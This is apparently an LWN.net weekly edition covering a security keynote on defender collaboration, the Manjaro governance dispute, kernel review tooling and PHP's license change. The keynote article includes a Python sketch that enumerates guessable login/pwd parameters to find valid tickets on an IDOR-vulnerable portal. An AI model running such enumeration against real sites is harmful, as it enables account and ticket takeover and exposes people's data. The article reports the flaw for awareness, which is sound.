
LWN.net Weekly Edition for March 26, 2026

Welcome to the LWN.net Weekly Edition for March 26, 2026

This edition contains the following feature content:

This week's edition also includes these inner pages:

  • Brief items: Brief news items from throughout the community.
  • Announcements: Newsletters, conferences, security updates, patches, and more.

Please enjoy this week's edition, and, as always, thank you for supporting LWN.net.

Comments (none posted)

Collaboration for battling security incidents

By Jake Edge
March 25, 2026

SCALE

The keynote for Sun Security Con 2026 (SunSecCon) was given by Farzan Karimi on how incident handling can go awry because of a lack of collaboration between the "good guys"—which stands in contrast to how attackers collaboratively operate. He provided some "war stories" where security incident handling had benefited from collaboration and others where it was hampered by its lack. SunSecCon was held in conjunction with SCALE 23x in Pasadena in early March.

He began with a premise that attackers, which he sometimes referred to as "hackers", collaborate, "they share tools, they share knowledge"; beyond that, they may share access to some of the members of their teams with others. On the other side, for defenders, things are different: "As effective as we are at the individual or team level, we're often victims of these organizational silos that trap us into not being able to collaborate well with each other." Specifically, "think of security versus software teams, product versus enterprise, blue team versus red team". The boundaries can be rigid: "if you're on the enterprise team and touch the scope of the product team, watch out".

He was once on a red team doing an exercise that simulated an attack by an adversary where he found a way to evade detection by disabling the endpoint detection and response (EDR) sensor system. His counterparts on the blue team were unhappy with that methodology because they wanted to use that information to see how he was attempting to evade detection; he pointed out that if attackers can disable EDR, they will. The exercise did not end particularly well, as he was called a "cheater" and a "one-trick pony", which hurt at the time and had the effect of isolating him from working with the blue team.

[Farzan Karimi]

The goal for the talk was to share some stories that demonstrated how successful collaboration on the defensive side "can transcend the attacker and lead to arrests"; on the flip side, failure to collaborate well can lead to "the attacker getting the upper hand". Karimi briefly introduced himself as the deputy chief information security officer (CISO) at Moderna, which is a Boston-based biotechnology company. He has led offensive security teams for around 15 years, including the red team at Google for Android for a few years, and before that was the founding member of a red team at the game company Electronic Arts (EA). He has spoken at the Black Hat and DEFCON security conferences over the years as well.

His theory is that "the real 0-day in companies isn't necessarily a technical flaw", it is, instead, isolation between humans in the organization. There are social pressures, such as the "fear of looking stupid" or individuals having the "hero mentality", that work against collaboration. While his stories were about security incidents, the details of those are not what is important in the talk. "It's the human behavior after the exploit, these tense situations where they escalated or de-escalated based on how the conversations went".

Story time

A talk he gave at DEFCON 33 in 2025 (YouTube video, slides) provided another example of collaboration gone awry. He presented a new technique, recursive request exploit (RRE), in the talk, but 17 hours before it began he was contacted by the legal department of a company that was affected by the exploit. The company felt that he had not done responsible disclosure, because it expected the problem to be reported to its HackerOne account, but Karimi had used email—to an address that he did not realize was not monitored.

The company had heard about his upcoming talk from a journalist and was threatening legal action if he gave the presentation. So, less than a day before the talk that he had spent months preparing for, he participated in a phone call where he explained what had happened; "it was really just a big miscommunication". He and the company had a different view of things, however. "I thought I was in the right and ethically I thought I took all the right steps, but the optics were different." When that kind of thing happens "you find yourself in a very difficult conversation and you have to find ways to de-escalate in those tense situations". He did not elaborate further, but he must have found some way to de-escalate since he gave the talk shortly thereafter.

When he was at EA, he worked on an incident regarding the virtual currency that is used in the FIFA football (soccer) video games. The currency can be used in-game to create a better team, but it can also be used to buy game merchandise; the FIFA coins have value outside of the game itself, so they are attractive to attackers. A Europe-based attacker found a vulnerability in an API for FIFA that allowed them to generate FIFA coins.

The attacker was able to create $324,000 in the virtual currency, which they immediately distributed across 25,000 seemingly random user accounts. That might seem like they were a "digital Robin Hood just giving FIFA coin back to the people", but a closer analysis showed that some of those accounts were actually controlled by the attacker. They were simply trying to obfuscate where the money was going. That really stacked the deck against EA being able to do something about the crime, because it was a foreign actor stealing money and hiding where it was going.

As it turned out, though, "good collaboration across multiple teams led to this person's arrest". When the theft was happening, the EA blue team noticed that something had gone wrong and analyzed the logs to discover which APIs had been attacked. Sometimes, a blue team will just continue doing that kind of analysis, but for this event, it did something different: "they looped in my red team" and asked if the attack could be reproduced from the logs as a form of evidence that it was what the attacker had done.

The red team was able to do that and provided the information to EA's legal team, which took it to court. The judge agreed that a crime had been committed, but the attacker was based in Italy at the time. Karimi said that he was not participating at that point, but that because it was a large enough sum of money, the FBI got involved and the attacker was somehow invited to come to the US. When he did, he was met by the FBI and arrested, eventually going to prison and having to pay restitution. So that was an example of a "really good collaboration, between IR [incident response], red team, and legal".

Unplanned collaboration

His next story was an example where the collaboration was not planned, but was forced on him. He was running a red team and compromising systems, which was exactly what he should be doing, but he unknowingly "compromised" a honeypot for an advanced persistent threat (APT) that attackers had left on the company's systems. The attackers behind the honeypot realized that he was part of the red team, so they used his credentials to launch other attacks on the network—effectively disguising their activities as coming from his account and systems.

One day, an investigator showed up in his office asking some rather pointed questions about what he had been up to, since the attackers had been targeting executives in the company. She was aware that he was not actually the attacker, but "she could have talked to me as if I was the victim or if I was an idiot red-teamer that didn't care about hygiene and left my credentials everywhere". She took a different approach that has stuck with him throughout his career since: she enlisted his aid in monitoring the attackers behind the APT.

"Instead of making me feel stupid, she brought me into the broader IR [incident response] initiative, which was really magic in a way". She probably does not even remember him, he said, but her actions made a big impact on him. She asked him to keep doing his normal things, which was hard given that he knew there were two different groups of people watching his every move. He had to keep that up for around two weeks, while the forensics team would periodically ask him to access various systems so they could watch the APT team follow along shortly thereafter. That allowed the team to collect a bunch of indicators of compromise (IOCs) and it shows, he said, that incidents can also be opportunities.

Over the line

The next tale was about "one of the most humbling moments of my career". While on a red team at Microsoft, he was doing an authorized penetration test (pentest) of an HR application that stored sensitive information about employees, including their salaries. He found a vulnerability that allowed him to get access to salary information, so he stopped and reported the bug.

But, instead of stopping after compromising one record, he made a mistake and wrote a script that pulled out more than 1,000 employee salaries, "like an idiot ... in retrospect". At the time, he thought he was demonstrating the scale of impact. He was "feeling really full of myself" after finding this critical flaw, so he made a second mistake. He joked with his office-mate that he was the lowest paid security engineer at Microsoft.

His office-mate laughed, but someone down the hall heard the joke and they did not laugh. Instead they escalated it and Karimi was called into his manager's office about an hour later. There, Karimi found out that he would not be getting the promotion that he had hoped the find would solidify, but that he might lose his job over the incident, which had already gone to legal as an ethics violation. In a ten-minute span, he had gone from a high that he had found a critical flaw to realizing that his whole career might be in jeopardy.

That kind of situation goes well beyond red-team activities, he said. Anyone with administrative access should be extremely careful in determining whether to use it; "just because you can, doesn't mean you should, and, if you have to think about it, you probably shouldn't". The scope of the work may provide legal permission, "but trust is the social permission and you really need to have both in order to be successful". He did manage to keep his job, which was a positive outcome.

Entertainment conference

The final story was about the web application for ticket sales to a prominent southern California entertainment conference, which he could not name due to an agreement with the conference's legal team. There are about 70,000 attendees and some of them were losing access to their legitimately purchased tickets at the same time there was a spike in ticket sales on reseller sites. He did not work for the conference and was not hired to work on the investigation, he just happened to be attending the conference; "it's a great story of surprise collaboration".

The impact of the problem was potentially quite large: roughly $35 million in total ticket sales, and much more if the conference had to be canceled because of the problems. Ticket buyers would receive an email that contained a link to directly take them to their page in the web portal—without having to log in. He asked if attendees had ideas about what kind of vulnerability to look out for; someone correctly guessed "IDOR", which is an insecure direct object reference.

He showed a redacted version of his portal page and the URL, which had two parameters of interest: login=FKnnnnn and pwd=mmmmm where nnnnn and mmmmm are two different numbers. He asked the audience for ideas on what to change in the URL; someone noted that "FK" are his initials and that the pwd number corresponded to the registration number on the page. He agreed and noted that the registration number was an incrementing integer per registration. The number after his initials turned out to be his phone number. "All of these are guessable parameters."

It gets worse, though. The phone number was a throwaway field in the login, he said, so the primary key was just the initials. In five minutes or so he had written a proof-of-concept script to loop through all of the initials "AA" to "ZZ", trying each pwd number from one to 900,000, which showed "hundreds and hundreds of tickets" that could be compromised. He took that to the organization, which immediately stepped up to fix the vulnerability and to handle the fraudulent ticket reselling. He asked attendees what they thought he got paid for that work; the answer was not zero, as many in the audience guessed, but slightly more: a T-shirt, he said, to laughter.
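The enumeration he described can be sketched in a few lines of Python. This is a hypothetical reconstruction, not his actual script: the base URL is a placeholder (the conference was never named), and the check for a successful hit is an assumed heuristic. Only the login and pwd parameter names, and the "AA"-to-"ZZ" by 1-to-900,000 guess space, come from the talk.

```python
import itertools
import string

# Placeholder: the real ticket-portal URL was never disclosed.
BASE_URL = "https://tickets.example.com/portal"

def candidate_params(max_reg=900_000):
    """Yield every (login, pwd) guess described in the talk: two-letter
    initials "AA" through "ZZ" crossed with registration numbers 1
    through max_reg.  The phone-number portion of the login was a
    throwaway field, per the talk, so only the initials matter."""
    for pair in itertools.product(string.ascii_uppercase, repeat=2):
        initials = "".join(pair)
        for reg in range(1, max_reg + 1):
            yield initials, reg

def is_hit(session, initials, reg):
    """Probe one guess; treating any page that renders a registration
    as a hit is an assumption, since the portal's responses are not
    public.  `session` is any requests-style HTTP session."""
    resp = session.get(BASE_URL, params={"login": initials, "pwd": reg})
    return resp.status_code == 200 and "registration" in resp.text.lower()
```

Separating the guess generator from the network probe means the loop can be stopped as soon as enough hits accumulate; a few minutes of output showing "hundreds and hundreds" of valid tickets was evidently already conclusive.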

"It doesn't matter whether you're a defender or you're on the offensive side, a software engineer or a sysadmin, when we stop treating each other as opponents, we win." Once that happens, "we start trusting each other more as a result". That is the thread running through all of the stories he related, he said.

The talk video is not yet available, but the YouTube livestream recording is available for anyone interested in seeing the talk.

[Thanks to LWN's travel sponsor, the Linux Foundation, for its travel funding to attend SCALE in Pasadena.]

Comments (none posted)

A truce in the Manjaro governance struggle

By Joe Brockmeier
March 20, 2026

Members of the Manjaro Linux distribution's community have published a "Manjaro 2.0 Manifesto" that contains a list of complaints and a demand to restructure the project to provide a clear separation between the community and Manjaro as a company. The manifesto asserts that the project's leadership is not acting in the best interests of the community, which has caused developers to leave and innovation to stagnate. It also demands a handover of the Manjaro trademark and other assets to a to-be-formed nonprofit association. The responses on the Manjaro forum showed widespread support for the manifesto; Philip Müller, project lead and CEO of the Manjaro company, largely stayed out of the discussion. However, he surfaced on March 19 to say he was "open to serious discussions", but only after a nonprofit had actually been set up.

Manjaro is based on Arch Linux; the idea behind the distribution is to provide a user-friendly version of Arch that is focused on stability. Manjaro provides additional tools for system maintenance, and has its own software repositories. The distribution uses a rolling-release model, with three branches (stable, testing, and unstable) for users to choose from. It began as an installer for Arch Linux, created by Müller, Guillaume Benoit, and Roland Singer, which was first announced in 2011 on the Arch forum and operated as a volunteer-driven project. As the project became more popular, it began taking donations for server costs and other "special activities" in 2013. The first stable release, Version 15.09 ("Bellatrix"), was announced in September 2015.

Müller announced in 2019 that he was forming a company in Germany with Manjaro core team member Bernhard Landauer. If that was discussed with the larger Manjaro community beforehand I have not found any evidence of it. The company was set up as a Kommanditgesellschaft (KG) called "Manjaro GmbH & Co. KG". Its stated goals were to improve the Manjaro infrastructure, become self-sustaining, and to hire additional contributors. It was also announced that the new company would hold the Manjaro trademarks in the EU and US "to prevent unauthorized use of Manjaro as a brand" while ensuring that the name could "always be used freely by the community". In 2024, the company announced that Landauer was leaving "to focus on other professional endeavors", and would be replaced by Roman Gilg as the chief technical officer.

Laptop-gate

The project has had some problems with the separation between company and community before now. Manjaro had already been taking donations for various activities before the formation of the company; funds were held in Müller's bank account. After the formation of the company, the funds for its community activities were moved to Open Collective. In 2020, after the split between company and community finances, there was a controversy over the purchase of a laptop from community funds.

Jonathon Fernyhough, who passed away in 2023, was serving as treasurer for Manjaro's community donations in 2020. He said that Müller had approved the purchase of a laptop by an unidentified third person, contrary to the project's written expense policy; Fernyhough rejected the expense. That led to his leaving his post as treasurer:

Phil was unhappy about the rejection and the additional questions about how community funds would be used. As a consequence I am no longer treasurer, leaving Phil in control of all funds once again. Phil is now in a position to use community funds as he sees fit in order to move the community project in the same direction as his company.

I will still be floating around the forum but at this point Manjaro doesn't seem all that friendly any more.

A forum post by Matti Hyttinen about Fernyhough's departure asserted that the laptop purchase was a legitimate expense and that the disagreement was solely about the process involved. It also said that Fernyhough's "position within the team became untenable" because of the way that he had expressed his disagreement about the handling of the expense. Fernyhough, though, called into question the way that community funds were being used, not just the failure to follow written process. He said that there was a definite conflict of interest with Manjaro GmbH "making deals with a hardware company to optimise Manjaro for laptops, then claiming expenses from community funds for laptops from that company to do development for that company."

Manifesto

Frank Vandermeiren made the manifesto public on March 9. It states that it is meant to be used as a focus for discussion and, ultimately, a guide for an organizational restructuring of the project. It describes separating the project from the company entirely and forming a nonprofit ("Manjaro e.V.") registered association. The Manjaro for-profit company would, over time, become a downstream of the project. The document also goes into some detail about how people would join the nonprofit association, how the decision-making process would work, and so forth.

The motivation given for this is that the project has "stagnated, lost trust, lost almost all of its contributors, and even became a laughingstock for repeatedly making the same mistakes" such as failing to renew SSL certificates in a timely fashion. The manifesto refers to "project leadership", rather than naming Müller directly, but also argues that Manjaro is "being run as one individual's personal project" with everything centralized around that person; it does not require much detective work to make the connection. It claims that Müller refuses to share access to supporting infrastructure for Manjaro with the rest of the project's team.

The Manjaro name is only used for its popularity, and the community is only used as guinea pigs and as unpaid workers, with as a result that the Project is severely suffering. As an example of this, no attempt is being made to acquire any funds for the Project, and the funds owned by the Manjaro GmbH & Co KG company are not being invested into the Project, with as a result that the Project's funds have now run out, causing Manjaro's only full-time developer to lose their only source of income.

We want the Manjaro Project to be revitalized, regain respect, attract contributors, and again provide meaningful value to the Open Source community.

The developer the manifesto is referring to seems to be Mark Wagie, though he does not seem to have been receiving full-time wages; according to the expenses page on Open Collective, he has regularly received payments from the project on an almost-monthly basis, totaling about €15,000, going back to October 2023. The Open Collective project page shows that Manjaro has raised a total of €87,556.13 since it joined, and has disbursed nearly €82,000 of that; it currently has a balance of less than €6,400. The project raised about €15,600 in the last 12 months via Open Collective; it does not appear that any of the funds came from the company.

Demands

In addition to its complaints and ideas about the future, the manifesto also makes a few demands. First, it says that the project expects the company to provide a license for use of the Manjaro trademark through 2029, while retaining the right to use the mark for its own products "as long as the Manjaro GmbH & Co KG company's use of the trademark does not cause any confusion" with the projects and such offered by the nonprofit. It also demands that the company declare its willingness to yield the trademark to the nonprofit entirely after 2029 for the price of one Euro.

On top of requiring the company to hand over the trademark, the manifesto demands that any assets or infrastructure "for which the Manjaro Project is its primary user" be handed over to the nonprofit. That includes the relevant GitHub organizations, Git repositories, Manjaro forum, manjaro.org domain, and more. The company is allowed to continue using the infrastructure "but is expected to actively work towards migrating as much as reasonably possible" and compensate the nonprofit for the usage costs. Further, the nonprofit would not guarantee that any shared services would be continued; the project could take down services or replace them without consulting the company first.

Finally, it states that if Müller ignores the manifesto, or does not make a serious attempt at "negotiating an acceptable compromise solution", the supporters will take action in stages. The first stage was simply to wait "a reasonable timespan" for a response; apparently he was given a copy of the manifesto privately around February 23. The second stage is to publicly release the document, which has obviously happened, and begin a "general strike"; the supporters of the manifesto will stop their "nonessential" work on the distribution and community efforts. The third stage is to "consider forking and/or leaving" the project.

The Manjaro web site lists a core team consisting of 17 people; at least six of those team members, including Gilg, have signed on in support of the manifesto. A few of the signatories have used only their forum usernames, so it is not clear whether those people are core team members. It also seems likely that some of the team are no longer active in the project, but have not been removed from the team list.

Reactions

Since the manifesto was made public on March 9, there have been more than 220 responses in a separate thread created specifically for the discussion. The first response, from Todor Uzunov, was completely in favor of the proposal: "The project is going down the drain as it is and is in many aspects poorly maintained. I was actually looking for alternative as a main daily OS because I cannot imagine this will survive another year or two." Koshika Surasena said that he whole-heartedly agreed with "all sentiments discussed and evident", but hoped that the community had not jumped the gun by going public. He worried that a public fight might harm the project, but noted that "waiting can only go for so long, and the project is definitely in a downward trend now".

Dennis ten Hoove, one of the manifesto's signatories, elaborated on the claims that the distribution had stagnated in the past five years or so. Manjaro had once had a "sizable group of people" contributing between five and ten years ago, but only two remained active with "maybe another 2 people picking up small stuff every now and then". He complained that there are "piles of issue reports being unaddressed" and pointed out that the work on Manjaro Arm has stalled. Releases for Arm seem to have stopped in early 2023; the images offered on the download page are from the 23.02 release, which was announced in February 2023. He also voiced concern about core applications like Manjaro's package manager (Pamac) and its installer (Calamares):

If a backbone application such as Pamac or Calamares breaks the project lacks motivated people with the skills to fix it. The Pamac dev has been MIA since the end of last year and there is a reported crash which needs fixing, but it is not getting fixed because there is no backup.

The majority of users seemed to be in agreement with the need for change, but not all. User "wntr" said that the manifesto was overly aggressive and "a coup demanding an unconditional surrender. Nobody sane would agree to this." They warned that a failure to reconcile could become "a public and possibly legal battle about who gets to be king of the pile of ash".

Another user, "Kobold", felt that things were fine. "I couldn't be happier with the Distro and I don't think that I would find a good replacement for Manjaro". In a later comment, though, they pointed to a thread from November 2025 that cast some doubt on the health of the project. The topic was about updates to Manjaro's stable repository; why had it not been updated in two months? When Todor Uzunov said that the project was understaffed, Müller's reply raised more questions than it answered: "Basically Mark and I do some work for Manjaro but we don't know for how long".

In context, his comment suggests that things may not be going well for Manjaro as a business, and that perhaps Müller is feeling burned out as well. If so, that would not be surprising; burnout is a real problem for open-source maintainers as well as small-business founders. Trying to be both simultaneously is, no doubt, quite demanding. The comment, though, does little to reassure other contributors or users when it's coming from the project lead who seems to have sole access to much of the project's infrastructure.

Müller's response

His first reply to the manifesto did little to quell concerns. Müller said that he had been sent a draft of the manifesto and was told it might be formally submitted at a later date. Now that it had been posted to the forum, it seemed that the community's intentions to form a nonprofit association were serious. He said that he had no personal objections to the founding of a nonprofit, but he would not be involved in the process.

Any transfers of company assets or infrastructure require close consultation with the company and yet to be established new legal entity, in order to ensure that the interests of both parties are safeguarded as amicably and smoothly as possible. Any actions that could damage the business must be ruled out. To ensure the smooth operation of the company, assets relevant to the company will remain within the company.

Finally, I would like to note that any actions or comments that could damage the business or reputation of myself or the company should be refrained from in order to ensure a mutually agreeable process and avoid legal actions.

Gilg, who at present still seems to be with the company despite having signed on to the manifesto, thanked Müller for the reply and "general agreement" that an association should be founded. He questioned the need for consultation with the company about the transition of assets to an association. The manifesto already provides a "precise list of assets", and he did not see a problem moving them to an association. Gilg asked if Müller saw an issue with it, but he did not reply directly. Nor did he reply to any of the other issues raised in the manifesto or participate in the discussion. However, Müller had been active on the forum in other threads; on March 16, he announced a set of package updates and warned that an age-verification law in Brazil might impact Manjaro users.

An association it is

On March 17, Vandermeiren acknowledged that with the matter out in the open it is difficult for Müller to respond publicly "without pulling a boatload of haters on top of himself", but noted that he has not responded via "the back channels" either. He said that the group behind the manifesto is patient and respectful, but a decision would ultimately have to be made.

Two days later Müller replied that "it seems a bit like the 'Mutiny on the Bounty'" to him, but he was not against having a nonprofit association. He would be open to discussions with a new entity, when it exists: "From my perspective, the new entity must first be established and a transition plan drawn up before anything can actually be set in motion." He also indicated that he had spoken to Gilg, and that Gilg had expressed an interest in taking the lead in founding the nonprofit association.

The ball is in your court. Decide as a community. Go ahead and set the new entity up, then get in touch with me – otherwise, business as usual...

Vandermeiren replied that the response "gives us hope that we can work out this problem very soon". Ten Hoove said that he thought there was an agreement to move forward, and that Gilg would handle the founding of the association. "We'll do as you ask and found the e.V., then work together to facilitate the migration of community components to said e.V." He also thanked the community for its support, "we'll take it from here. And we'll keep you in the loop."

For now, it appears there will be a return to the status quo until an association is founded and negotiations begin. Müller has only indicated a willingness to have discussions, though; he has not provided a guarantee that he is willing to turn over all, or any, of the assets listed in the manifesto. We will keep an eye on any developments as they happen, and hope that the outcome is a good one that serves the Manjaro community well.

Comments (1 posted)

Development tools: Sashiko, b4 review, and API specification

By Jonathan Corbet
March 19, 2026
The kernel project has a unique approach to tooling that avoids many commonly used development systems that do not fit the community's scale and ways of working. Another way of looking at the situation is that the kernel project has often under-invested in tooling, and sometimes seems bent on doing things the hard way. In recent times, though, the amount of effort that has gone into development tools for the kernel has increased, with some interesting results. Recent developments in this area include the Sashiko code-review system, a patch-review manager built into b4, and a new attempt at a framework for the specification and verification of kernel APIs.

Sashiko

Sashiko has been slowly gaining visibility in the development community; it was formally announced by Roman Gushchin on March 17. It is based on large language models, and its job is to review patches posted to the kernel mailing lists. According to Gushchin:

In my measurement, Sashiko was able to find 53% of bugs based on a completely unfiltered set of 1,000 recent upstream issues using "Fixes:" tags (using Gemini 3.1 Pro). Some might say that 53% is not that impressive, but 100% of these issues were missed by human reviewers.

Developers have already started paying attention to the tool's reviews, with some maintainers (Andrew Morton, for example) expecting patch submitters to read and respond to those reviews.

Sashiko is based on a set of review prompts initially developed by Chris Mason, but it uses "a different multi-stage review protocol, which somewhat mimics the human review process and forces the LLM to look at the proposed change from different angles". While the only access to Sashiko now is through its web interface, the plans call for it to eventually gain the ability to send out reviews over email.

The system is described as being "fully open-source", downloadable from a GitHub repository under the Apache-2.0 license. The ownership of the code itself has been given to the Linux Foundation. Sashiko is, of course, an open-source system that is built on a proprietary foundation (the Gemini model), so it is not truly a free-software solution. But it is a step closer to that than what we had before. And a tool like this does indeed seem to bring value to the community. While the ability of LLMs to generate kernel code is unproven at best, their ability to find obscure problems in code written by humans has been reasonably well demonstrated.

The use of tools like Sashiko will surely grow, but there is a worrisome aspect as well. Since Sashiko depends on its underlying LLM, the Sashiko service depends on some generous benefactor being willing to make the LLM time it needs available. That is happening now, while the AI bubble remains pretty well inflated and the purveyors of LLMs are trying to create dependencies on those models wherever they can. At some point, though, that generosity seems likely to come to an end. Google is nicely donating LLM time for Sashiko now, but remember that the company once freely handed out Nexus One phones to developers. Now those developers are expected to buy their own toys. One hopes that, when that history repeats itself in the LLM context, the community will not have let the ability to do its own reviews atrophy entirely.

b4 review

Konstantin Ryabitsev's b4 tool has changed kernel development in a number of ways. Maintainers depend on it to simplify the tasks of applying patches and adding review tags. Increasingly, developers (especially those who do not work full-time in the kernel community) use it for email-free patch submission. B4 can download email threads from the lore archive, making it possible to read kernel-related discussions locally without subscribing to the linux-kernel firehose. The in-development review functionality, which is not yet part of a formal b4 release, promises to further ease the patch-review process.

[b4 patch-review screen] In short, the b4 review subcommand provides a terminal-based interface to a number of patch-review operations. After enrolling a repository, the user can add one or more patch sets of interest, using message IDs, lore URLs, or by simply piping a patch into the tool from an email client. The main b4 review screen lists each in-progress patch set and its current state.

A separate review screen allows looking at each patch in a series. With a single keystroke, an entire patch series can be fed to the checkpatch.pl tool, and the results gathered for inspection. Another keystroke opens an editor with a specific patch where the reviewer can enter comments in the usual way. There are operations to add tags (Reviewed-by, for example) to the response. Inevitably, another command will feed the patch to the user's LLM-based review system of choice; Sashiko integration is underway as of this writing. Once the comments are deemed ready, they can be emailed back out with another command.

For maintainers, b4 review can bring in comments sent by others for consideration. There are also tools to apply a set of accepted patches, and to help with conflict resolution. And, at the end of it all, there is a feature to automatically send "thank-you" notes to the submitters whose patches have been applied.

[b4 checkpatch screen] Intrigued, I played a bit with b4 review on the stream of documentation patches; the screenshots in this section are the result of that experiment. The tool in its current state has a lot of rough edges — it is described as being in "alpha" condition, after all. That experiment resulted in the posting of an embarrassingly mangled review that led to the discovery (and fixing) of a b4 review bug; a number of other issues were reported as well. This tool is fun to play with, but it is not yet ready for sustained production use.

It will get there, though, and it has the potential to change how a lot of people work. b4 review is not the first patch-tracking and management tool out there, but it is one that is designed to work in a distributed manner, without a central server. It is a part of Ryabitsev's effort to reduce the role of email in the development process to a sort of transport layer, and to free contributors from the need to engage directly with it if they do not wish to. The lore archive would be hard to replace, but b4 review does not otherwise depend on any system being up and available. This is a tool that is worth watching.

API specification

There has been a recurring desire for better ways to specify the interface that the kernel provides to user space — and to verify that this API actually matches the specification. A specification of this type, if it could be created and maintained, would serve a number of purposes. It would help developers ensure that patches do not change the user-space API in incompatible ways. Formal verification tools would have a better description of how the kernel is supposed to work. Development environments could use this description to assist in the writing and debugging of code. And so on.

Efforts to implement this sort of specification have typically languished, though, for a number of reasons. For example, a group including Gabriele Paoloni has been working on a specification language for some time, but has struggled to attract interested developers. A separate effort in this area, most recently posted on March 13, is a specification framework by Sasha Levin. This is a new version of work that was last covered here in 2025.

Like other attempts, Levin's work is focused on the kernel-doc comments that already describe thousands of functions within the kernel. It expands the coverage of those comments to describe, in a formal way, many aspects of a function's behavior. As an example, the documentation for this framework provides an example comment for kmalloc() (which is not part of the user-space API, but internal functions can be specified too):

    /**
     * kmalloc - allocate kernel memory
     * @size: Number of bytes to allocate
     * @flags: Allocation flags (GFP_*)
     *
     * context-flags: KAPI_CTX_PROCESS | KAPI_CTX_SOFTIRQ | KAPI_CTX_HARDIRQ
     * param-count: 2
     *
     * param: size
     *   type: KAPI_TYPE_UINT
     *   flags: KAPI_PARAM_IN
     *   constraint-type: KAPI_CONSTRAINT_RANGE
     *   range: 0, KMALLOC_MAX_SIZE
     *
     * error: ENOMEM, Out of memory
     *   desc: Insufficient memory available for the requested allocation.
     */

The first four lines are part of the existing kernel-doc format; everything after that is new. This specification describes the contexts within which kmalloc() can be called, various details about the parameters to the function, and the return value. For a rather more detailed example, see the specification for the read() system call, which goes on for several pages. It covers the parameters and (numerous) error returns, as seen above, but also includes information on signal handling, lock acquisition, side effects (modifying the file position, for example), and more.
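As a rough illustration of how such an entry reads, here is an abridged, hypothetical sketch in the same style as the kmalloc() example; the fields beyond those shown there (side-effect:, signal:) are guesses at the syntax, not the framework's actual vocabulary:

```
/**
 * read - read data from a file descriptor
 * @fd: File descriptor to read from
 * @buf: Destination buffer in user space
 * @count: Maximum number of bytes to read
 *
 * context-flags: KAPI_CTX_PROCESS
 * param-count: 3
 *
 * param: count
 *   type: KAPI_TYPE_UINT
 *   flags: KAPI_PARAM_IN
 *   constraint-type: KAPI_CONSTRAINT_RANGE
 *   range: 0, MAX_RW_COUNT
 *
 * error: EBADF, Bad file descriptor
 *   desc: fd does not refer to an open file descriptor.
 * error: EFAULT, Bad address
 *   desc: buf points outside the accessible address space.
 *
 * side-effect: Advances the file position by the number of bytes read.
 * signal: Interruptible; a blocked read may return -EINTR.
 */
```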

There is an alternative format using macros rather than comments; it's not entirely clear why the second format exists. Beyond functions, there are plans for facilities to describe the arguments to ioctl() calls.

Once the specifications exist, there are a number of things that can be done with them. There is a tool to ensure, at compile time, that the specifications are consistent with the declarations of the functions they describe. The specifications are available via the debugfs filesystem in human-readable, JSON, and XML formats. There is also a run-time validation mode that checks whether functions are called in an allowed context with parameters within the given constraints, and that the return value is as specified. The cost of all this is nearly 500KB of memory used for each described function; this is not a feature one would want to enable in production kernels.

The problem with this kind of specification mechanism is always the same. Few people disagree with having precise specifications for how the code is supposed to work, but even fewer seem to be willing to put in the time to create and maintain those specifications. The work can be tedious and tends not to astonish users with exciting new features; it is the sort of thing that people generally need to be paid to do. LLMs can be pressed into service for some of this work (as was done for this series), but humans still need to be involved to be sure that the results are accurate — and to maintain them going forward. Creating this sort of framework is feasible from a technology point of view, but success in this area will also depend on solving the social problem of creating and maintaining the specifications themselves.

Comments (2 posted)

A PHP license change is imminent

By Joe Brockmeier
March 24, 2026

PHP's licensing has been a source of confusion for some time. The project currently uses two licenses that cover different parts of the code base: the PHP License v3.01 for the bulk of the code and the Zend Engine License v2.0 for code in the Zend directory. Much has changed since the project settled on those licenses in 2006, and the need for custom licensing seems to have passed. An effort to simplify PHP's licensing, led by Ben Ramsey, is underway; if successful, the existing licenses will be deprecated and replaced by the three-clause BSD license. The PHP community is now voting on the license-update RFC through April 4, 2026.

In its early days, the PHP project changed its licensing with some frequency: between 1995 and 2006, PHP changed licenses or modified the terms of its custom licenses seven times. Initially, PHP was distributed under the GPLv2. Then PHP 3, released in 1998, was shipped under a dual-license scheme; it was available under the GPLv2 and a new PHP License based on the Apache License 1.0. This was chosen by PHP creator Rasmus Lerdorf to make PHP more palatable to commercial interests:

PHP2 has gotten quite a few nibbles from various commercial interests over the past year. The GPL, plus my own stubbornness killed most of them. PHP, if I can help it, will always be free. But, I am not against letting commercial entities take a shot at a commercial version as long as the terms are such that the major contributors don't feel cheated.

The first iteration of the custom license, though, had a clause that required written permission from the PHP development team for commercial redistribution. That proved unworkable, so the clause was stricken for the PHP 3.0.14 release. The LICENSE file in that release did not carry a version number.

PHP 4.0, released in May 2000, was a major overhaul; it included the Zend Engine, described at the time as a full rewrite of the PHP scripting engine, written by Zeev Suraski and Andi Gutmans. The pair had formed a company, Zend Technologies, which sought to commercialize the Zend Engine separately from PHP; it provided a grant to allow the Zend Engine to be integrated into PHP and guaranteed that it would remain under the Zend license or another license consistent with the Open Source Definition (OSD) from the Open Source Initiative (OSI), even though the Zend license itself is not OSI-approved. Thus, the PHP project picked up the Zend license for code in the Zend directory of its source tree. PHP 4.0 also dropped the GPLv2 altogether in favor of the PHP License version 2.02.

PHP's licenses were updated a few more times; the PHP 3.0 license was approved by the OSI, but the license received a small final set of changes that pushed it to version 3.01. The changes only updated the copyright years and reworded the required acknowledgements for PHP and Zend; they did not affect the rights granted in any way. The reasons for that change are lost to the mists of time, but that version was never approved by the OSI. The license text has proven to be a problem because it only appears to apply to software shipped by the "PHP Group". Confusingly, the PHP Group does not seem to be an actual legal entity, but a list of ten people involved in PHP development early on. Some contend that software from parties other than the PHP Group cannot use it as a valid license. That has caused headaches for other projects, such as Debian. Ramsey has covered the history of PHP's licensing in the RFC for those who want even more detail.

Proposal

Ramsey opened discussion on the RFC in July 2025; he proposed replacing both of the existing licenses with the three-clause BSD license beginning with the next major release, PHP 9.0. He had enlisted an expert for the exercise; he said he was working with Pamela Chestek, chair of OSI's license committee, for legal questions and concerns.

He said that he had already spoken with all the members of the PHP Group and each member had already voiced approval for the change. He had also gotten approval from Perforce Software, which had acquired Zend in 2019 as part of the portfolio owned by Rogue Wave Software (which had, itself, acquired Zend in 2015). One might wonder about all of the individual contributors who had submitted code to PHP over the years: don't they also have to approve a license change? In the RFC, Ramsey argues that is not the case. PHP has not required a contributor-license agreement (CLA) to assign copyright to the project, and there is no implicit transfer of copyright to the project. However, there is an implied assignment of license:

When someone contributes to an open source project, they own the copyright on their contributions, but unless they specify a different license covering their contributions (which is wholly valid, with examples including Derick Rethans's timelib, which is bundled within the PHP source code), it is implied they are granting use of their contributions under the same license terms as the project.

